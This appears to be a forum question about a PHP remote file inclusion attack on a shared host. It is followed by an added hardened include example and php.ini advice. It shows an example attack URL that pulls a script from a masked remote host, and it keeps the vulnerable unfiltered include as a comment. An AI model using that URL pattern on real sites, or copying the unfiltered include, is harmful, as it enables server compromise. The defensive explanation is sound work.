fopen and urls in PHP - Security Issue
I provide a shared hosting environment and have had a client write an insecure script using the "include" statement. The server got hacked (more details below) and I eventually changed the "allow_url_fopen" php.ini setting to "Off" to disable the source of the attacks. My question is: Does anyone know how I can allow allow_url_fopen to be "On" and still protect against poor programming?
More specifics on hack...
The user was including local files in his url (had to use hddp to post this)
hddp://domain.com/index.php?inc=some_file.php and the vandal simply typed in
hddp://domain.com/index.php?inc=201.XXX.XXX.XXX/destructive_script.exe ...
Without filtering the incoming variable $inc, the vandal successfully installed a root kit and ... well you know the rest.
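The pattern the post describes is an unfiltered `include $_GET['inc']`, which lets a request name a remote URL as the file to include. The following is an added example, not the poster's or the client's code: it keeps the vulnerable form as a comment for comparison and shows a hardened replacement that maps a request key to a fixed allowlist of files and then verifies the resolved path stayed inside one directory. The page names (`home`, `about`, `contact`), the `pages/` directory and the `resolve_include` helper are assumptions for the illustration.

```php
<?php
// Added example (not the poster's code). Assumes the vulnerable pattern
// from the post: include $_GET['inc'] with no filtering of $inc.

// --- Vulnerable form, as described in the post -------------------------------
// include $_GET['inc'];  // inc=<remote host>/script pulls remote code into PHP

// --- Hardened form ------------------------------------------------------------

// Allowlist: the request supplies a short key, never a path or URL.
// (Page names and the pages/ directory are constructed for this example.)
$pages = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a request key to an absolute file path inside $baseDir.
 * Returns null when the key is unknown or the file resolves outside $baseDir.
 */
function resolve_include(string $key, array $pages, string $baseDir): ?string
{
    // 1. Reject anything not in the allowlist (covers URLs, ../, %00, etc.).
    if (!array_key_exists($key, $pages)) {
        return null;
    }

    // 2. Resolve both the base directory and the target to canonical paths.
    $base   = realpath($baseDir);
    $target = realpath($base . DIRECTORY_SEPARATOR . $pages[$key]);
    if ($base === false || $target === false) {
        return null;
    }

    // 3. Confirm the canonical target is still inside the base directory,
    //    so a mistake in the allowlist table cannot escape it either.
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }

    return $target;
}

$key  = $_GET['inc'] ?? 'home';
$file = resolve_include($key, $pages, __DIR__ . '/pages');

if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}

include $file;
```

Two php.ini settings complement this for the question actually asked. `allow_url_include` controls whether `include`/`require` may open URLs at all and is separate from `allow_url_fopen`; setting `allow_url_include = Off` while leaving `allow_url_fopen = On` keeps `fopen()`/`file_get_contents()` on URLs working for scripts that need it but refuses remote includes server-wide. `open_basedir` additionally confines all file access for a site to a directory tree, which limits what a local-file include can reach even when a script forgets to validate its input.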